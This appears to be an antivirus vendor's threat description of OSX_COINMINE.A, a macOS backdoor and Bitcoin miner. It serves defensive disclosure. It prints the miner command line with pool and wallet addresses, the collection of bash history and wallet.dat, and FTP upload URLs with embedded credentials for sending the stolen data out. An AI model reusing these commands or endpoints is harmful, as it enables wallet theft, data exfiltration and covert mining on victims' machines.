OSX_COINMINE.A

This spyware executes a Bitcoin miner daemon by running a certain command. It executes the bundled DiabloMiner.jar, detected by Trend Micro as JAVA_COINMINE.A, passing command-line parameters. It creates a text file dump.txt that contains the certain information. It zips the file dump.txt to {random hexadecimal number}_{random hexadecimal number}_{random hexadecimal number}.zip by running the a command. It uploads {random hexadecimal number}_{random hexadecimal number}_{random hexadecimal number}.zip to FTP servers.

This Spyware may arrive bundled with malware packages as a malware component. It may be downloaded by other malware/grayware from remote sites.

It executes commands from a remote malicious user, effectively compromising the affected system.

Arrival Details

This Spyware may arrive bundled with malware packages as a malware component.

It may be downloaded by the following malware/grayware from remote sites:

• TROJ_COINMINE.A

Backdoor Routine

This Spyware opens the following port(s) where it listens for remote commands:

• TCP port 34123

It executes the following commands from a remote malicious user:

• 1 - execute a command and return the result to the remote client
• 2 - take a screenshot by running the command screencapture -T 0 -x 1.png, uuencode the file 1.png to s.txt, send s.txt to the remote client, and delete 1.png and s.txt after sending
• any other command - close the connection

NOTES:

It executes a Bitcoin miner daemon by running the following command:

• ./minerd --url http://su.mining.eligius.st:8337 --userpass {Bitcoin host user name}:123 --algo cryptopp_asm32

It executes the bundled DiabloMiner.jar, detected by Trend Micro as JAVA_COINMINE.A, passing the following command-line parameters:

• -u {Bitcoin host user name} -p 123 -o su.mining.eligius.st -r 8337 -v 2 -f 20

{Bitcoin host user name} can be any of the following:

• 16i22nMinPcWf5UUSVNWBosZbQ65DsfiAX
• 15DzENUPvq3TSsnr4QgMFY8L8mih1MRpi1
• 1FNnnNMDoPQA2PwHJaK3cZZSTcWq42GRTh

It creates a text file dump.txt that contains the following information:

• Number of files whose file name contains truecrypt
• Number of files whose file name contains pthc
• Number of files whose file name contains vidalia
• The entire contents of the file /Users/{user name}/.bash_history
• The entire contents of the file /Users/{user name}/Library/Application Support/Bitcoin/wallet.dat, if it exists

It zips the file dump.txt to {random hexadecimal number}_{random hexadecimal number}_{random hexadecimal number}.zip by running the following command:

• zip -r -X {random hexadecimal number}_{random hexadecimal number}_{random hexadecimal number}.zip dump.txt

It uploads {random hexadecimal number}_{random hexadecimal number}_{random hexadecimal number}.zip to the following FTP servers:

• ftp://bubba47:semiram237@ftp.drivehq.com/{random hexadecimal number}_{random hexadecimal number}_{random hexadecimal number}.zip
• ftp://acab73:boss583@ftp.drivehq.com/{random hexadecimal number}_{random hexadecimal number}_{random hexadecimal number}.zip
• ftp://manamar489:most832@ftp.drivehq.com/{random hexadecimal number}_{random hexadecimal number}_{random hexadecimal number}.zip

It drops the file status.cfg which contains its current configuration.